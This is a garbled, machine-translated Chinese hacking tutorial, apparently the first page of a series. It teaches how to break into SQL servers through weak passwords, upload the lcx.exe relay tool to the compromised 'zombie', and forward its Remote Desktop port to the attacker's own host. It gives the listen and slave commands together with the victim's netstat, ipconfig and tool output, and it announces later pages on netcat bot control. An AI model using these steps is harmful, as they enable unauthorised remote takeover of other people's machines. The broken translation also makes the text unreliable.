How to Use lcx.exe1_nc.exe1_ SC .exe in Intrusion

Article Title: How to Use lcx.exe1_nc.exe1_ SC .exe in intrusion. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.

How to Use lcx.exe

In the past, we caught bots through weak passwords of 1433, and then ..

Upload to the server...

Lcx.exe is A port forwarding tool, which forwards port 3389 on port A to port B. Of course, port B must have an Internet IP address. in this way, the 3389-degree port connecting to machine B is equivalent to 3389 of the connection to machine.

Usage: If you listen to-listen 51 3389 on server B and run-Server Load balancer ip address 51 ip address 3389 on Server Load balancer A, you can connect to Server Load balancer 3389 locally. the second is the local steering.

For example, there is currently a weak 1433 ip address of 201.1.1.1. port 1433 is only available for port scanning. Use the sqltools link. dir to check whether C: \> dir c :\

AutoAK

12,541 avgun. log ..........................................

Japanese: the display is abnormal.

Netstat-an open port TCP 0.0.0.0: 3376 0.0.0.0: 0 LISTENING

TCP 0.0.0.0: 3389 0.0.0.0: 0 LISTENING

TCP 0.0.0.0: 3791 0.0.0.0: 0 LISTENING

TCP 0.0.0.0: 3877 0.0.0.0: 0 LISTENING

Terminal enabled. Check IP Address

Ipconfig

C: \> ipconfig

Windows 2000 IP Configuration Ethernet adapter

Connection-specific DNS Suffix .:

IP Address ......: 192.168.1.24

Subnet Mask ......: 255.255.255.0

Default Gateway...: 192.168.1.1192 Is intranet...

Now we can use lcx.exe to get it done...

Upload lcx.exe to zombie... C: \> dir lcx.exe C: \ WINNT \ system32

2006/04/02 32,768 lcx.exe first runs in the cmd of its own host

Lcx.exe-listen 51 (3389)

Listening to port 51 and forwarding to port 3389

Display the following [+] Listening port 51 ......

[+] Listen OK!

[+] Listening port 3389 ......

[+] Listen OK!

[+] Waiting for Client on port: 51 ...... then run lcx.exe-slave on the bot your IP address 51 201.1.1.1 3389

201.1.1.1 is the zombie IP address I used in the example. Change it to yours. After the local Listening port is run, the information will be received. [+] Listening port 51 ......

[+] Listen OK!

[+] Listening port 3389 ......

[+] Listen OK!

[+] Waiting for Client on port: 51 ......

[+] Accept a Client on port 55 from 201.1.1.1 ......

[+] Waiting another Client on port: 3389... okay. Now, link 127.0.0.1 to your machine or enter your own IP address.

I found that it was not my own machine (or my machine could not be connected), but A zombie! Advantages: deal with intranet bots.

Disadvantage: it is a little troublesome, and port forwarding must be performed through sqltools each time. Of course, you can also use a bounce Trojan to control Bots...

++ ++

How to Use nc.exe

1. Netcat 1.10 for NT-nc11nt.zip, original English Information

2. Netcat 1.10 for NT help information

3. Common Netcat 1.10 command formats

4. Manage bots and change zombie settings

[1] [2] [3] [4] Next page